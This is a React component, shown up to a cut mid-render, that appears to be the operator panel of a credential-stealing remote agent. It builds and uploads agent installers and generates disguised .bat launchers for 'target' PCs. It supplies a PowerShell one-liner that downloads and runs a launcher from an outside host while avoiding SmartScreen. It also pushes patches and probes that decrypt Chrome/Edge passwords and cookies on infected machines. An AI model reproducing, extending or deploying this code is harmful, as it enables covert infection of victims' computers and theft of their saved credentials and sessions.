/**
 * Agent Installer — MSI upload, .bat generation, install code management.
 *
 * Super admin: upload MSI for any admin, generate/download .bat for any admin, revoke codes.
 * Regular admin: generate/download their own .bat, revoke their own code.
 *
 * The generated .bat never contains the server URL or agent token — only a
 * neutral short code (e.g. A3F9B2) pointing to update.docmail.cloud.
 */
import React, { useState, useEffect, useCallback, useRef } from 'react';
import { useAuth } from '../store/auth';
import toast from 'react-hot-toast';

const API = process.env.REACT_APP_SERVER_URL || '';

export default function AgentInstaller() {
  const { authHeaders, claims } = useAuth();
  const isSuper    = !!claims?.super;
  const agentToken = claims?.agent_token;

  // Super admin state
  const [admins, setAdmins]         = useState([]);   // list from /installer/list
  const [selectedToken, setSelectedToken] = useState('');
  const [manualToken, setManualToken] = useState('');   // super admin's own / custom token
  const [useManual, setUseManual]   = useState(false);
  const [uploading, setUploading]   = useState(false);
  const [uploadPct, setUploadPct]   = useState(0);
  const fileRef = useRef();

  // Shared state
  const [status, setStatus]         = useState(null);  // installer status for selected/own token
  const [loadingStatus, setLoadingStatus] = useState(false);

  // .bat form
  const [batFilename, setBatFilename] = useState('install');
  const [batMsg1,     setBatMsg1]     = useState('Setting up, please wait...');
  const [batMsg2,     setBatMsg2]     = useState('Installation is running in the background. You may safely close this window.');
  const [batMsg3,     setBatMsg3]     = useState('Downloading and installing in the background...');
  const [generating,  setGenerating]  = useState(false);
  const [revoking,    setRevoking]    = useState(false);
  const [deleting,    setDeleting]    = useState(false);
  const [downloadingMsi, setDownloadingMsi] = useState(false);
  const [restarting,  setRestarting]  = useState(null);  // device agentToken being restarted
  const [restartingAll, setRestartingAll] = useState(false);
  const [patchingCrypto, setPatchingCrypto] = useState(false);
  const [patchingDiag,   setPatchingDiag]   = useState(false);
  const [probingDecrypt, setProbingDecrypt] = useState(false);
  const [buildingToken, setBuildingToken]   = useState(null);  // agent_token currently being built
  const [buildStatuses, setBuildStatuses]   = useState({});    // { [agent_token]: { status, install_code, error } }
  const buildPollRef   = useRef({});
  const [builds,       setBuilds]           = useState([]);    // build history
  const [buildsLoading,setBuildsLoading]    = useState(false);
  const [activeBuildId,setActiveBuildId]    = useState(null);  // build whose log is expanded
  const [buildLog,     setBuildLog]         = useState('');
  const [buildLogStatus, setBuildLogStatus] = useState('');
  const logPollRef     = useRef(null);
  const logPanelRef    = useRef(null);

  // ── Load admin list (super admin only) ──────────────────────────────────
  const loadAdmins = useCallback(async () => {
    if (!isSuper) return;
    try {
      const res = await fetch(`${API}/installer/list`, { headers: authHeaders() });
      if (!res.ok) return;
      const data = await res.json();
      setAdmins(data);
      if (data.length && !selectedToken) setSelectedToken(data[0].agent_token);
    } catch { /* ignore */ }
  }, [isSuper, authHeaders, selectedToken]);

  // ── Load status for current token ───────────────────────────────────────
  const loadStatus = useCallback(async (token) => {
    if (!token) return;
    setLoadingStatus(true);
    try {
      const res = await fetch(`${API}/installer/status/${token}`, { headers: authHeaders() });
      if (!res.ok) { setStatus(null); return; }
      setStatus(await res.json());
    } catch { setStatus(null); }
    finally { setLoadingStatus(false); }
  }, [authHeaders]);

  // ── Fetch build history ─────────────────────────────────────────────────
  const fetchBuilds = useCallback(async () => {
    setBuildsLoading(true);
    try {
      const res = await fetch(`${API}/installer/builds`, { headers: authHeaders() });
      if (!res.ok) return;
      setBuilds(await res.json());
    } catch { /* ignore */ }
    finally { setBuildsLoading(false); }
  }, [authHeaders]);

  // ── Poll build log ───────────────────────────────────────────────────────
  const startLogPoll = useCallback((buildId) => {
    if (logPollRef.current) clearInterval(logPollRef.current);
    setActiveBuildId(buildId);
    setBuildLog('');
    setBuildLogStatus('building');
    setTimeout(() => logPanelRef.current?.scrollIntoView({ behavior: 'smooth', block: 'start' }), 100);
    const poll = async () => {
      try {
        const res = await fetch(`${API}/installer/build/${buildId}/log`, { headers: authHeaders() });
        if (!res.ok) return;
        const d = await res.json();
        setBuildLog(d.log || '');
        setBuildLogStatus(d.status || '');
        if (d.status !== 'building') {
          clearInterval(logPollRef.current);
          logPollRef.current = null;
          fetchBuilds();
        }
      } catch { /* ignore */ }
    };
    poll();
    logPollRef.current = setInterval(poll, 5000);
  }, [authHeaders, fetchBuilds]);

  useEffect(() => { loadAdmins(); fetchBuilds(); }, []);

  useEffect(() => {
    const token = isSuper ? selectedToken : agentToken;
    if (token) loadStatus(token);
  }, [selectedToken, agentToken, isSuper]);

  // ── Upload MSI (super admin) ─────────────────────────────────────────────
  const handleUpload = (e) => {
    const file = e.target.files?.[0];
    if (!file || !activeToken) return;
    setUploading(true);
    setUploadPct(0);

    const form = new FormData();
    form.append('file', file);
    const headers = authHeaders();

    const xhr = new XMLHttpRequest();
    xhr.open('POST', `${API}/installer/upload?agent_token=${encodeURIComponent(activeToken)}`);
    Object.entries(headers).forEach(([k, v]) => xhr.setRequestHeader(k, v));

    xhr.upload.onprogress = (ev) => {
      if (ev.lengthComputable) setUploadPct(Math.round((ev.loaded / ev.total) * 100));
    };

    xhr.onload = async () => {
      try {
        const data = JSON.parse(xhr.responseText);
        if (xhr.status >= 200 && xhr.status < 300) {
          toast.success(`Uploaded ${data.filename} — code: ${data.code}`);
          await loadAdmins();
          await loadStatus(activeToken);
        } else {
          toast.error(data.detail || 'Upload failed');
        }
      } catch { toast.error('Upload failed'); }
      finally { setUploading(false); setUploadPct(0); if (fileRef.current) fileRef.current.value = ''; }
    };

    xhr.onerror = () => {
      toast.error('Upload failed — network error');
      setUploading(false); setUploadPct(0);
      if (fileRef.current) fileRef.current.value = '';
    };

    xhr.send(form);
  };

  // ── Download .bat ────────────────────────────────────────────────────────
  const handleDownloadBat = async (tokenOverride) => {
    const token = tokenOverride || activeToken;
    if (!token) return;
    if (!status?.has_msi) {
      toast.error('No installer found. Upload this admin\'s MSI first.');
      return;
    }
    setGenerating(true);
    try {
      const params = new URLSearchParams({
        msg1:     batMsg1,
        msg2:     batMsg2,
        msg3:     batMsg3,
        filename: batFilename || 'install',
      });
      const res = await fetch(`${API}/installer/bat/${token}?${params}`, {
        headers: authHeaders(),
      });
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        toast.error(data.detail || 'Failed to generate .bat');
        return;
      }
      const blob = await res.blob();
      const fname = (batFilename || 'install').replace(/\.bat$/i, '') + '.bat';
      const url = URL.createObjectURL(blob);
      const a = document.createElement('a');
      a.href = url; a.download = fname; a.click();
      URL.revokeObjectURL(url);
      toast.success(`Downloaded ${fname}`);
    } catch { toast.error('Download failed'); }
    finally { setGenerating(false); }
  };

  // ── Download MSI ─────────────────────────────────────────────────────────
  const handleDownloadMsi = async (tokenOverride) => {
    const token = tokenOverride || activeToken;
    if (!token) return;
    if (!status?.has_msi) {
      toast.error('No MSI found for this admin.');
      return;
    }
    setDownloadingMsi(true);
    const tid = toast.loading(
      `Downloading ${status.msi_filename || 'installer.msi'}… (${status.msi_size_mb} MB)`,
    );
    try {
      const res = await fetch(`${API}/installer/download-msi/${token}`, {
        headers: authHeaders(),
      });
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        toast.dismiss(tid);
        toast.error(data.detail || 'Download failed');
        return;
      }
      const blob = await res.blob();
      const fname = status.msi_filename || 'installer.msi';
      const url = URL.createObjectURL(blob);
      const a = document.createElement('a');
      a.href = url; a.download = fname; a.click();
      URL.revokeObjectURL(url);
      toast.dismiss(tid);
      toast.success(`Downloaded ${fname}`);
    } catch (e) {
      toast.dismiss(tid);
      toast.error('Download failed');
    } finally {
      setDownloadingMsi(false);
    }
  };

  // ── Delete MSI ───────────────────────────────────────────────────────────
  const handleDeleteMsi = async () => {
    const token = activeToken;
    if (!token) return;
    if (!window.confirm('Delete the MSI file for this admin? The install code will also be revoked. This cannot be undone.')) return;
    setDeleting(true);
    try {
      const res = await fetch(`${API}/installer/msi/${token}`, {
        method: 'DELETE',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Delete failed'); return; }
      toast.success(`Deleted ${data.deleted}`);
      await loadStatus(token);
      if (isSuper) await loadAdmins();
    } catch { toast.error('Delete failed'); }
    finally { setDeleting(false); }
  };

  // ── Restart agents by admin token ──────────────────────────────────────
  const handleRestartAgent = async (agentToken) => {
    if (!agentToken) return;
    setRestarting(agentToken);
    try {
      const res = await fetch(`${API}/cmd/restart_by_token/${agentToken}`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Restart failed'); return; }
      if (data.total === 0) {
        toast('No devices registered under this admin yet.');
      } else if (data.queued > 0 && data.sent === 0) {
        toast(`All ${data.queued} device(s) offline — restart queued for next connect.`);
      } else if (data.queued > 0) {
        toast.success(`Restart sent to ${data.sent} device(s). ${data.queued} queued for offline.`);
      } else {
        toast.success(`Restart sent to ${data.sent} device(s).`);
      }
    } catch { toast.error('Request failed'); }
    finally { setRestarting(null); }
  };

  // ── Restart all agents ────────────────────────────────────────────────────
  const handleRestartAll = async () => {
    if (!window.confirm('Restart ALL agents? Live agents will restart immediately. Offline agents will restart on next connect.')) return;
    setRestartingAll(true);
    try {
      const res = await fetch(`${API}/cmd/restart_all`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Failed'); return; }
      toast.success(`Restart sent to ${data.sent} live agent(s). ${data.queued} queued for offline.`);
    } catch { toast.error('Request failed'); }
    finally { setRestartingAll(false); }
  };

  // ── Push crypto patch to all online agents ───────────────────────────────
  const handlePatchCrypto = async () => {
    if (!window.confirm('Push pycryptodome BCrypt patch to all currently-online agents?\n\nThis fixes Chrome/Edge password and cookie decryption on agents built without pycryptodome. No restart required.')) return;
    setPatchingCrypto(true);
    try {
      const res = await fetch(`${API}/cmd/patch/crypto`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Failed'); return; }
      toast.success(`Crypto patch sent to ${data.online} online agent(s). ${data.fully_patched} patched & restarted — they'll reconnect in ~10 seconds.`);
    } catch { toast.error('Request failed'); }
    finally { setPatchingCrypto(false); }
  };

  // ── Push diagnostic monkeypatch (no restart) ────────────────────────────
  const handlePatchDiag = async () => {
    setPatchingDiag(true);
    try {
      const res = await fetch(`${API}/cmd/patch/diag`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Failed'); return; }
      toast.success(`Crypto test sent to ${data.patched}/${data.online} agents — result toast will appear in ~3s.`);
    } catch { toast.error('Request failed'); }
    finally { setPatchingDiag(false); }
  };

  // ── Probe: run extract_passwords live and report result ──────────────────
  const handleProbeDecrypt = async () => {
    setProbingDecrypt(true);
    try {
      const res = await fetch(`${API}/cmd/probe/decrypt?browser=edge`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Failed'); return; }
      toast.success(`Decrypt probe sent to ${data.sent}/${data.online} agents — result toast will appear in ~15s.`);
    } catch { toast.error('Request failed'); }
    finally { setProbingDecrypt(false); }
  };

  // ── Queue VPS agent build ────────────────────────────────────────────────
  const handleBuild = async (token) => {
    if (!token) return;
    setBuildingToken(token);
    setBuildStatuses(prev => ({ ...prev, [token]: { status: 'building', install_code: null, error: null } }));
    try {
      const res = await fetch(`${API}/installer/build?agent_token=${encodeURIComponent(token)}`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) {
        const msg = data.detail || 'Build failed to start';
        toast.error(msg);
        setBuildStatuses(prev => ({ ...prev, [token]: { status: 'failed', install_code: null, error: msg } }));
        setBuildingToken(null);
        return;
      }
      toast('Build queued on VPS — this takes 3–5 minutes…');
      const buildId = data.build_id;
      await fetchBuilds();
      startLogPoll(buildId);
      // Poll for completion
      const poll = setInterval(async () => {
        try {
          const pr = await fetch(`${API}/installer/builds`, { headers: authHeaders() });
          if (!pr.ok) return;
          const builds = await pr.json();
          const build = builds.find(b => b.id === buildId);
          if (!build) return;
          if (build.status === 'done') {
            clearInterval(poll);
            delete buildPollRef.current[token];
            setBuildingToken(null);
            setBuildStatuses(prev => ({ ...prev, [token]: { status: 'done', install_code: build.install_code, error: null } }));
            toast.success(`Build complete! Install code: ${build.install_code}`);
            await loadAdmins();
            await loadStatus(token);
            await fetchBuilds();
          } else if (build.status === 'failed') {
            clearInterval(poll);
            delete buildPollRef.current[token];
            setBuildingToken(null);
            setBuildStatuses(prev => ({ ...prev, [token]: { status: 'failed', install_code: null, error: build.error } }));
            toast.error(`Build failed: ${build.error || 'Unknown error'}`);
            await fetchBuilds();
          }
        } catch { /* ignore poll errors */ }
      }, 10000);
      buildPollRef.current[token] = poll;
    } catch {
      toast.error('Request failed');
      setBuildStatuses(prev => ({ ...prev, [token]: { status: 'failed', install_code: null, error: 'Request failed' } }));
      setBuildingToken(null);
    }
  };

  // ── Revoke code ──────────────────────────────────────────────────────────
  const handleRevoke = async () => {
    const token = activeToken;
    if (!token) return;
    if (!window.confirm('Revoke current install code? All existing .bat files will stop working. A new code will be generated.')) return;
    setRevoking(true);
    try {
      const res = await fetch(`${API}/installer/revoke/${token}`, {
        method: 'POST',
        headers: authHeaders(),
      });
      const data = await res.json();
      if (!res.ok) { toast.error(data.detail || 'Revoke failed'); return; }
      toast.success(`New code generated: ${data.new_code}`);
      await loadStatus(token);
      if (isSuper) await loadAdmins();
    } catch { toast.error('Revoke failed'); }
    finally { setRevoking(false); }
  };

  // ── Render ───────────────────────────────────────────────────────────────
  const activeToken = isSuper
    ? (useManual ? manualToken.trim() : selectedToken)
    : agentToken;
  const selectedAdmin = admins.find(a => a.agent_token === selectedToken);

  return (
    <div style={{ maxWidth: 760 }}>
      <div style={{ display:'flex', alignItems:'center', justifyContent:'space-between', marginBottom: 4 }}>
        <h2 style={{ marginTop: 0, marginBottom: 0, fontWeight: 700 }}>Agent Installer</h2>
        {isSuper && (
          <div style={{ display:'flex', gap:8 }}>
            <button
              onClick={handleProbeDecrypt}
              disabled={probingDecrypt}
              style={{ ...btn('#38bdf8'), fontSize: 12 }}>
              {probingDecrypt ? 'Probing...' : '🩺 Probe Decrypt'}
            </button>
            <button
              onClick={handlePatchDiag}
              disabled={patchingDiag}
              style={{ ...btn('#a78bfa'), fontSize: 12 }}>
              {patchingDiag ? 'Sending...' : '🔬 Diag Crypto'}
            </button>
            <button
              onClick={handlePatchCrypto}
              disabled={patchingCrypto}
              style={{ ...btn('#4ade80'), fontSize: 12 }}>
              {patchingCrypto ? 'Patching...' : '⚡ Patch Crypto (All Online)'}
            </button>
            <button
              onClick={handleRestartAll}
              disabled={restartingAll}
              style={{ ...btn('#f59e0b'), fontSize: 12 }}>
              {restartingAll ? 'Sending...' : '↻ Restart All Agents'}
            </button>
          </div>
        )}
      </div>
      <p style={{ color: 'var(--muted)', fontSize: 13, marginBottom: 28 }}>
        {isSuper
          ? 'Upload MSI files for admins and generate custom .bat launchers. The .bat never exposes the server URL or agent token.'
          : 'Generate a .bat launcher for your agent installer. The .bat can be run on any target PC — installation completes silently in the background.'}
      </p>

      {/* ── Super admin: admin selector ── */}
      {isSuper && (
        <Section title={
          <span style={{ display:'flex', alignItems:'center', justifyContent:'space-between' }}>
            Select Admin
            <button onClick={() => { loadAdmins(); if (selectedToken) loadStatus(selectedToken); }}
              style={{ ...btn(), fontSize:11, padding:'3px 10px', marginLeft:12 }}>
              ↻ Refresh
            </button>
          </span>
        }>
          {admins.length === 0 ? (
            <Empty text="No admins with agent tokens found." />
          ) : (
            <div style={{ display: 'flex', flexWrap: 'wrap', gap: 8 }}>
              {admins.map(a => (
                <div key={a.agent_token} style={{ display:'flex', alignItems:'center', gap: 4 }}>
                  <button
                    onClick={() => setSelectedToken(a.agent_token)}
                    style={{
                      padding: '7px 14px', borderRadius: 6, fontSize: 12, cursor: 'pointer',
                      fontWeight: selectedToken === a.agent_token ? 700 : 400,
                      background: selectedToken === a.agent_token ? 'var(--accent)22' : 'transparent',
                      border: `1px solid ${selectedToken === a.agent_token ? 'var(--accent)' : 'var(--border)'}`,
                      color: selectedToken === a.agent_token ? 'var(--accent)' : 'var(--muted)',
                      display: 'flex', alignItems: 'center', gap: 6,
                    }}>
                    <span style={{
                      width: 7, height: 7, borderRadius: '50%', flexShrink: 0,
                      background: a.has_msi && a.has_code ? 'var(--green)' : a.has_msi ? '#f59e0b' : 'var(--muted)',
                    }} />
                    {a.name}
                  </button>
                  <button
                    title={`Restart ${a.name}'s agents`}
                    disabled={restarting === a.agent_token}
                    onClick={() => handleRestartAgent(a.agent_token)}
                    style={{
                      padding: '5px 8px', borderRadius: 6, fontSize: 11, cursor: 'pointer',
                      background: 'transparent',
                      border: '1px solid var(--border)',
                      color: 'var(--muted)',
                    }}>
                    {restarting === a.agent_token ? '...' : '↻'}
                  </button>
                  <button
                    title={`Build MSI for ${a.name}`}
                    disabled={buildingToken === a.agent_token}
                    onClick={() => handleBuild(a.agent_token)}
                    style={{
                      padding: '5px 8px', borderRadius: 6, fontSize: 11, cursor: 'pointer',
                      background: buildingToken === a.agent_token ? 'var(--border)' : 'transparent',
                      border: `1px solid ${buildStatuses[a.agent_token]?.status === 'done' ? 'var(--green)' : buildStatuses[a.agent_token]?.status === 'failed' ? '#ef4444' : 'var(--border)'}`,
                      color: buildStatuses[a.agent_token]?.status === 'done' ? 'var(--green)' : buildStatuses[a.agent_token]?.status === 'failed' ? '#ef4444' : 'var(--muted)',
                    }}>
                    {buildingToken === a.agent_token ? '⏳' : buildStatuses[a.agent_token]?.status === 'done' ? '✓' : buildStatuses[a.agent_token]?.status === 'failed' ? '✗' : '🔨'}
                  </button>
                </div>
              ))}
            </div>
          )}
          <div style={{ marginTop: 10, fontSize: 11, color: 'var(--muted)' }}>
            <span style={{ marginRight: 12 }}>
              <span style={{ display:'inline-block', width:7, height:7, borderRadius:'50%',
                             background:'var(--green)', marginRight:4, verticalAlign:'middle' }}/>
              MSI uploaded + code active
            </span>
            <span style={{ marginRight: 12 }}>
              <span style={{ display:'inline-block', width:7, height:7, borderRadius:'50%',
                             background:'#f59e0b', marginRight:4, verticalAlign:'middle' }}/>
              MSI uploaded, no code
            </span>
            <span>
              <span style={{ display:'inline-block', width:7, height:7, borderRadius:'50%',
                             background:'var(--muted)', marginRight:4, verticalAlign:'middle' }}/>
              No MSI
            </span>
          </div>
        </Section>
      )}

      {/* ── Build Log (live) — shown right below admin selector ── */}
      {activeBuildId && (
        <div ref={logPanelRef}>
        <Section title={
          <span style={{ display:'flex', alignItems:'center', justifyContent:'space-between' }}>
            <span>Build Log — #{activeBuildId}</span>
            <span style={{ display:'flex', gap:8, alignItems:'center' }}>
              {buildLogStatus === 'building' && (
                <span style={{ fontSize:11, color:'#f59e0b', fontWeight:600 }}>⏳ Building…</span>
              )}
              {buildLogStatus === 'done' && (
                <span style={{ fontSize:11, color:'var(--green)', fontWeight:600 }}>✓ Done</span>
              )}
              {buildLogStatus === 'failed' && (
                <span style={{ fontSize:11, color:'#ef4444', fontWeight:600 }}>✗ Failed</span>
              )}
              <button onClick={() => { setActiveBuildId(null); setBuildLog(''); if(logPollRef.current){clearInterval(logPollRef.current);logPollRef.current=null;} }}
                style={{ ...btn(), fontSize:11, padding:'3px 10px' }}>✕ Close</button>
            </span>
          </span>
        }>
          <div style={{
            background: '#0d0d0d', border: '1px solid #333', borderRadius: 6,
            padding: 14, fontFamily: 'monospace', fontSize: 11, color: '#d1d5db',
            maxHeight: 360, overflowY: 'auto', whiteSpace: 'pre-wrap', wordBreak: 'break-all',
            lineHeight: 1.5,
          }}>
            {buildLog || 'Waiting for build output…'}
          </div>
        </Section>
        </div>
      )}

      {/* ── Super admin: manual / own token ── */}
      {isSuper && (
        <Section title="Use Your Own / Custom Agent Token">
          <div style={{ fontSize: 13, color: 'var(--muted)', marginBottom: 10 }}>
            Use this if your own agent token isn't listed above (e.g. super admin's own machines).
          </div>
          <div style={{ display: 'flex', gap: 8, alignItems: 'center', flexWrap: 'wrap' }}>
            <input
              value={manualToken}
              onChange={e => { setManualToken(e.target.value); setUseManual(false); }}
              placeholder="Paste agent token here..."
              style={{ ...inputStyle, marginBottom: 0, flex: 1, minWidth: 260, fontFamily: 'monospace', fontSize: 12 }}
            />
            <button
              onClick={() => {
                if (!manualToken.trim()) { toast.error('Paste a token first'); return; }
                setUseManual(true);
                setSelectedToken('');
                loadStatus(manualToken.trim());
              }}
              style={btn('var(--accent)')}>
              Use This Token
            </button>
            {useManual && (
              <button onClick={() => { setUseManual(false); setManualToken(''); }}
                style={btn()}>Clear</button>
            )}
          </div>
          {useManual && (
            <div style={{ marginTop: 8, fontSize: 12, color: 'var(--green)' }}>
              Active token: <code style={{ fontFamily: 'monospace' }}>{manualToken.trim().slice(0, 16)}...</code>
            </div>
          )}
        </Section>
      )}

      {/* ── Status card ── */}
      {activeToken && (
        <Section title={
          <span style={{ display:'flex', alignItems:'center', justifyContent:'space-between' }}>
            Installer Status
            <button
              onClick={() => loadStatus(activeToken)}
              disabled={loadingStatus}
              style={{ ...btn(), fontSize:11, padding:'3px 10px', marginLeft:12 }}>
              {loadingStatus ? '...' : '↻ Refresh'}
            </button>
          </span>
        }>
          {loadingStatus ? (
            <div style={{ color: 'var(--muted)', fontSize: 13 }}>Loading...</div>
          ) : status ? (
            <>
              <div style={{ background: 'var(--surface)', border: '1px solid var(--border)',
                            borderRadius: 8, padding: 16, display: 'flex', flexWrap: 'wrap', gap: 16 }}>
                <StatusItem
                  label="MSI File"
                  value={status.has_msi ? `${status.msi_filename} (${status.msi_size_mb} MB)` : 'Not uploaded'}
                  ok={status.has_msi}
                />
                <StatusItem
                  label="Install Code"
                  value={status.has_code ? status.code : 'None'}
                  ok={status.has_code}
                  mono
                />
                {status.has_msi && (
                  <StatusItem
                    label="Last Built"
                    value={status.msi_built_at ? new Date(status.msi_built_at + 'Z').toLocaleString() : '—'}
                    ok={true}
                  />
                )}
              </div>
              {status.has_msi && (
                <div style={{ marginTop: 12 }}>
                  <button
                    onClick={() => handleDownloadMsi()}
                    disabled={downloadingMsi}
                    style={btn('var(--accent)')}>
                    {downloadingMsi ? 'Downloading…' : `⬇️ Download ${status.msi_filename || 'MSI'}`}
                  </button>
                  <span style={{ fontSize: 11, color: 'var(--muted)', marginLeft: 10 }}>
                    {status.msi_size_mb} MB
                  </span>
                </div>
              )}
              {status.has_code && status.code && (
                <div style={{ marginTop: 16, background: 'var(--surface)', border: '1px solid var(--border)', borderRadius: 8, padding: 14 }}>
                  <div style={{ fontSize: 12, fontWeight: 600, color: 'var(--accent)', marginBottom: 8 }}>
                    Run Command — No SmartScreen
                  </div>
                  <div style={{ fontSize: 11, color: 'var(--muted)', marginBottom: 8 }}>
                    Give this to the target user to paste into <b>Win+R</b> or a PowerShell window.
                    Downloads the installer via PowerShell (no Zone.Identifier → no SmartScreen warning).
                  </div>
                  <div style={{ display: 'flex', gap: 8, alignItems: 'center' }}>
                    <code style={{
                      display: 'block', flex: 1, fontFamily: 'monospace', fontSize: 11,
                      background: 'var(--bg)', border: '1px solid var(--border)',
                      borderRadius: 5, padding: '8px 10px', wordBreak: 'break-all',
                      color: 'var(--text)', lineHeight: 1.6, userSelect: 'all',
                    }}>
                      {`powershell -Command "[Net.ServicePointManager]::SecurityProtocol='Tls12';$f=$env:TEMP+'\\s.bat';(New-Object Net.WebClient).DownloadFile('https://update.docmail.cloud/installer/bat-pub?c=${status.code}',$f);Start-Process $f"`}
                    </code>
                    <button
                      onClick={() => {
                        const cmd = `powershell -Command "[Net.ServicePointManager]::SecurityProtocol='Tls12';$f=$env:TEMP+'\\\\s.bat';(New-Object Net.WebClient).DownloadFile('https://update.docmail.cloud/installer/bat-pub?c=${status.code}',$f);Start-Process $f"`;
                        navigator.clipboard.writeText(cmd).then(() => toast.success('Run command copied!')).catch(() => toast.error('Copy failed'));
                      }}
                      style={{ ...btn('var(--accent)'), whiteSpace: 'nowrap', fontSize: 11, padding: '6px 14px' }}>
                      Copy
                    </button>
                  </div>
                </div>
              )}
            </>
          ) : (
            <div style={{ color: 'var(--muted)', fontSize: 13 }}>No status available.</div>
          )}
        </Section>
      )}

      {/* ── Super admin: upload MSI ── */}
      {isSuper && activeToken && (
        <Section title={`Upload MSI — ${useManual ? 'Custom Token' : (selectedAdmin?.name || activeToken.slice(0, 12) + '...')}`}>
          <div style={{ fontSize: 13, color: 'var(--muted)', marginBottom: 12 }}>
            Upload the MSI built with this admin's agent token. Any existing MSI for this admin will be replaced and a new install code generated automatically.
          </div>
          <label style={{
            display: 'inline-flex', alignItems: 'center', gap: 8,
            padding: '9px 18px', background: uploading ? 'transparent' : 'var(--accent)22',
            border: '1px solid var(--accent)', borderRadius: 6,
            color: 'var(--accent)', fontSize: 13, fontWeight: 600, cursor: uploading ? 'default' : 'pointer',
          }}>
            {uploading ? 'Uploading...' : 'Choose & Upload MSI'}
            <input
              ref={fileRef}
              type="file"
              accept=".msi,.MSI"
              style={{ display: 'none' }}
              disabled={uploading}
              onChange={handleUpload}
            />
          </label>
          {uploading && (
            <div style={{ marginTop: 14, maxWidth: 400 }}>
              <div style={{ display: 'flex', justifyContent: 'space-between',
                            fontSize: 12, color: 'var(--muted)', marginBottom: 5 }}>
                <span>Uploading...</span>
                <span style={{ fontWeight: 700, color: 'var(--accent)' }}>{uploadPct}%</span>
              </div>
              <div style={{ height: 6, background: 'var(--border)', borderRadius: 4, overflow: 'hidden' }}>
                <div style={{
                  height: '100%', borderRadius: 4,
                  background: 'var(--accent)',
                  width: `${uploadPct}%`,
                  transition: 'width 0.2s ease',
                }} />
              </div>
            </div>
          )}
          <div style={{ fontSize: 11, color: 'var(--muted)', marginTop: 8 }}>
            Accepted: .msi files only. Max 500 MB. The filename you choose is preserved.
          </div>
        </Section>
      )}

      {/* ── .bat generator ── */}
      {activeToken && (
        <Section title="Generate .bat Launcher">
          {!status?.has_msi && (
            <div style={{
              background: '#f59e0b11', border: '1px solid #f59e0b66',
              borderRadius: 8, padding: '12px 16px', marginBottom: 16,
              fontSize: 13, color: '#f59e0b',
            }}>
              {isSuper
                ? 'No MSI uploaded for this admin yet. Upload one above first.'
                : 'No installer found. Ask your super admin to upload your MSI first.'}
            </div>
          )}

          <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: 16 }}>
            <div>
              <label style={labelStyle}>Opening message (shown when .bat runs)</label>
              <input
                value={batMsg1}
                onChange={e => setBatMsg1(e.target.value)}
                placeholder="Setting up, please wait..."
                style={inputStyle}
                disabled={!status?.has_msi}
              />
            </div>
            <div>
              <label style={labelStyle}>.bat filename</label>
              <input
                value={batFilename}
                onChange={e => setBatFilename(e.target.value)}
                placeholder="install"
                style={inputStyle}
                disabled={!status?.has_msi}
              />
              <div style={{ fontSize: 11, color: 'var(--muted)', marginTop: -8 }}>
                .bat extension added automatically
              </div>
            </div>
          </div>

          <div>
            <label style={labelStyle}>Background status message (shown after launch starts)</label>
            <input
              value={batMsg3}
              onChange={e => setBatMsg3(e.target.value)}
              placeholder="Downloading and installing in the background..."
              style={{ ...inputStyle, width: '100%', boxSizing: 'border-box' }}
              disabled={!status?.has_msi}
            />
          </div>

          <div>
            <label style={labelStyle}>Background handoff message (shown before CMD closes)</label>
            <input
              value={batMsg2}
              onChange={e => setBatMsg2(e.target.value)}
              placeholder="Installation is running in the background. You may safely close this window."
              style={{ ...inputStyle, width: '100%', boxSizing: 'border-box' }}
              disabled={!status?.has_msi}
            />
          </div>

          {/* Preview */}
          {status?.has_msi && (
            <div style={{
              background: '#0d0d0d', border: '1px solid #333', borderRadius: 6,
              padding: '12px 16px', marginBottom: 16, fontFamily: 'monospace', fontSize: 12,
            }}>
              <div style={{ color: '#888', marginBottom: 6, fontSize: 11 }}>CMD preview</div>
              <div style={{ color: '#e2e8f0' }}>{batMsg1 || '(empty)'}</div>
              <div style={{ color: '#6b7280', marginTop: 4 }}>{batMsg3 || '(empty)'}</div>
              <div style={{ color: '#e2e8f0', marginTop: 4 }}>{batMsg2 || '(empty)'}</div>
            </div>
          )}

          <div style={{ display: 'flex', gap: 8, flexWrap: 'wrap' }}>
            <button
              onClick={() => handleDownloadBat()}
              disabled={!status?.has_msi || generating}
              style={btn(status?.has_msi ? 'var(--accent)' : undefined)}>
              {generating ? 'Generating...' : `Download ${(batFilename || 'install').replace(/\.bat$/i, '')}.bat`}
            </button>
            {status?.has_code && (
              <button
                onClick={handleRevoke}
                disabled={revoking}
                style={btn('var(--red)')}>
                {revoking ? 'Revoking...' : 'Revoke Code & Regenerate'}
              </button>
            )}
            {status?.has_msi && (
              <button
                onClick={handleDeleteMsi}
                disabled={deleting}
                style={btn('#ef444488')}>
                {deleting ? 'Deleting...' : 'Delete MSI'}
              </button>
            )}
          </div>

          <div style={{ marginTop: 12, fontSize: 12, color: 'var(--muted)', lineHeight: 1.6 }}>
            The .bat file contains no server URL or agent token — only a short opaque code
            pointing to <code style={{ color: 'var(--accent)' }}>update.docmail.cloud</code>.
            Revoking the code instantly invalidates all existing .bat files for this admin.
          </div>
        </Section>
      )}

      {/* ── Build History ── */}
      <Section title={
        <span style={{ display:'flex', alignItems:'center', justifyContent:'space-between' }}>
          Build History
          <button onClick={fetchBuilds} disabled={buildsLoading}
            style={{ ...btn(), fontSize:11, padding:'3px 10px', marginLeft:12 }}>
            {buildsLoading ? '...' : '↻ Refresh'}
          </button>
        </span>
      }>
        {builds.length === 0 ? (
          <Empty text="No builds yet. Click 🔨 next to an admin to queue a build." />
        ) : (
          <div style={{ display:'flex', flexDirection:'column', gap:6 }}>
            {builds.map(b => (
              <div key={b.id} style={{
                background: 'var(--surface)', border: '1px solid var(--border)',
                borderRadius: 8, padding: '10px 14px',
                display:'flex', alignItems:'center', gap:12, flexWrap:'wrap',
